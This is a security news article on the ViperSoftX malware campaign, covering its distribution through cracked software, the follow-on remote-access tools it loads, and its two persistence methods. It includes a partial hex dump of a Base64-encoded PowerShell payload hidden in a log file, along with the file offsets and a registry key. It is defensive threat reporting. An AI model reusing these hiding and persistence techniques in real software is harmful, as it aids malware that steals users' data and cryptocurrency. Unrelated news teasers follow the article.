Threat Actors Using ViperSoftX Malware to Exfiltrate Sensitive Details

06/06/2025

Korean cybersecurity researchers have uncovered a sophisticated malware campaign targeting cryptocurrency users worldwide, with ViperSoftX emerging as a persistent threat that continues to evolve its attack methodologies.

First identified by Fortinet in 2020, this malware has demonstrated remarkable longevity and adaptability, consistently updating its techniques to bypass security measures while maintaining its core objective of stealing digital assets and sensitive information from infected systems.

The malware primarily spreads through deceptive distribution channels, masquerading as cracked software, key generators for legitimate applications, and even eBooks distributed via torrent sites.

This distribution strategy exploits users’ desire for free software, turning their trust into a vulnerability that threat actors readily exploit.

The campaign has shown particular effectiveness in targeting users who download illegal software duplicates, making it one of the primary initial access tactics observed alongside poorly managed service exploits and malicious email attachments.

ASEC analysts identified that ViperSoftX operators have significantly expanded their arsenal beyond simple cryptocurrency theft, now deploying additional malware families including Quasar RAT for remote access, PureCrypter as an executable loader, and PureHVNC for comprehensive system control.

The researchers noted that while the threat actors are not specifically targeting South Korea, the widespread use of cracked software distribution methods has resulted in numerous confirmed infection cases across the region, highlighting the global reach of this campaign.

Flowchart (Source – ASEC)

The malware’s impact extends beyond individual cryptocurrency theft, as it establishes persistent backdoors that allow threat actors to execute arbitrary commands, download additional payloads, and maintain long-term access to compromised systems.

This creates a cascading security risk where initial cryptocurrency-focused attacks can evolve into comprehensive data breaches and system compromises affecting both individual users and potentially their organizational networks.

Advanced Persistence Mechanisms and System Integration

ViperSoftX demonstrates sophisticated persistence capabilities through its strategic use of Windows Task Scheduler, implementing multiple registration methods to ensure continued execution even after system reboots.

The malware employs at least two distinct persistence techniques, each designed to evade detection while maintaining reliable command and control communication with its operators.

The primary persistence method involves creating scheduled tasks that execute malicious PowerShell scripts through VBScript commands.

These tasks are programmed to read specific byte sequences from seemingly legitimate log files, which actually contain Base64-encrypted PowerShell code embedded at predetermined offsets.

The malware reads exactly 0x1A6 bytes from offset 0x1F843C of the target file, decrypts this data into Base64 format, and executes it as a PowerShell downloader.

This technique demonstrates the malware’s ability to hide its payload within apparently innocuous system files, making detection significantly more challenging for traditional security tools.

001F8440 62 47 55 67 4B 43 52 30 63 6E 56 6C 4B 53 42 37
001F8450 44 51 6F 67 49 43 41 67 64 48 4A 35 49 48 73 4E DQogICAgdHJ5IHSN
001F8460 43 69 41 67 49 43 41 67 49 43 41 67 4A 48 49 67 CiAgICAgICAgJHIg
001F8470 50 53 42 4A 62 6E 5A 76 61 32 55 74 55 6D 56 7A PSBJbnZva2UtUmVz

Powershell script encrypted with Base64 (Source – ASEC)

The encrypted PowerShell script demonstrates the malware’s sophisticated obfuscation techniques, embedding executable code within what appears to be error message text.

The secondary persistence mechanism utilizes registry-based storage, where PowerShell scripts are placed in the %SystemDirectory% path and configured to read encrypted commands from specific registry keys such as “HKLMSOFTWAREHPgs6ZtP670 / xr417LXh.”

This dual-layered approach ensures that even if one persistence method is detected and removed, the malware can continue operating through its backup channels, maintaining its foothold on compromised systems while downloading additional payloads and executing threat actor commands.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests
Source: cybersecuritynews.com

QNAP NetBak Replicator Vulnerability Let Attackers Execute Unauthorized Code

QNAP has released a security advisory detailing a vulnerability in its NetBak Replicator utility that could allow local attackers to execute unauthorized code. The flaw, identified as CVE-2025-57714, has been rated as “Important” and affects specific versions of the backup and restore software. The company has already issued a patch and is urging users to update their systems to prevent … [Read More...]

How Windows Command-line Utility PsExec Can Be Abused To Execute Malicious Code

PsExec represents one of the most contradictory tools in the cybersecurity landscape, a legitimate system administration utility that has become a cornerstone of malicious lateral movement campaigns. Recent threat intelligence reports indicate that PsExec remains among the top five tools used in cyberattacks as of 2025, with ransomware groups like Medusa, LockBit, and Kasseika actively … [Read More...]

You'd think this was a real Stream Deck, but this genius DIYer 3D printed it and made it smart-home ready

Elgato's Stream Deck isn't meant for everyone, but it's one of the most widely adopted devices in recent years, especially among streamers, content creators, and productivity enthusiasts. Stream Deck's growing popularity also led to other players entering the space to compete with Corsair and giving users more choices. However, these aren't the only options, as it's pretty simple to build your own … [Read More...]

PoC Exploit Released for Remotely Exploitable Oracle E-Business Suite 0-Day Vulnerability

A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available. CVE-2025-61882 presents a severe security risk, achieving a maximum CVSS 3.1 score of 9.8 and enabling remote code execution without authentication across multiple Oracle E-Business Suite … [Read More...]

Zimbra Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files

Oct 06, 2025Ravie LakshmananEmail Security / Zero-Day A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military. Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient … [Read More...]

Oppo Reno 15 Series Key Specifications and India Launch Timeline Leaked

Oppo Reno 15 series, which is expected to comprise the Oppo Reno 15, Reno Pro, and Reno 15 Pro+, might debut in China in the second half of 2025. This means that its launch could be weeks away, or it might debut in a couple of months. A tipster has now revealed that the smartphone lineup has entered the testing phase in global markets, including India. The India launch timeline of the Oppo Reno 15 … [Read More...]

iQOO Neo 11 Key Specifications Leaked; Could Feature Snapdragon 8 Elite Chipset, 7,500mAh Battery

iQOO appears to be preparing for the launch of the iQOO Neo 11, which could arrive in China and eventually make its way to global markets. Although the Vivo sub-brand has yet to reveal any plans for a new Neo series smartphone, a tipster has leaked key specifications that point to a significant upgrade over the existing Neo 10 model. The purported iQOO Neo 11 is expected to feature a … [Read More...]

This cozy medieval city builder with 85% positive Steam reviews is still on discount

Well, that's another big Steam seasonal sale in the books. How did yours go? I didn't pick up a ton of titles this time around, but I still scored some nice discounts on games like The Roottrees Are Dead, so I'm still pleased. Source: xda-developers.com … [Read More...]

Moto G06 Power India Launch Date Announced; Key Features, Flipkart Availability Confirmed

Moto G06 Power was unveiled at IFA 2025 alongside the standard Moto G06 and Motorola Edge 60 Neo in September. The company has now announced that the Power variant will arrive in India soon. Alongside confirming the launch date, Motorola has revealed some key features of the upcoming handset. The Indian version is expected to share similarities with its global counterpart. It will be available in … [Read More...]

Who Will Be Apple’s Next CEO After Tim Cook? John Ternus Could Reportedly Take Charge

Apple's list of senior executives who have left the company is growing long. From former design chief Jony Ive and retail head Angela Ahrendts in 2019 to former Chief Financial Officer, Luca Maestri, and former Chief Operating Officer, Jeff Williams, in the last two years, the company has lost a significant part of its vanguard. While the Cupertino-based tech giant has been able to find … [Read More...]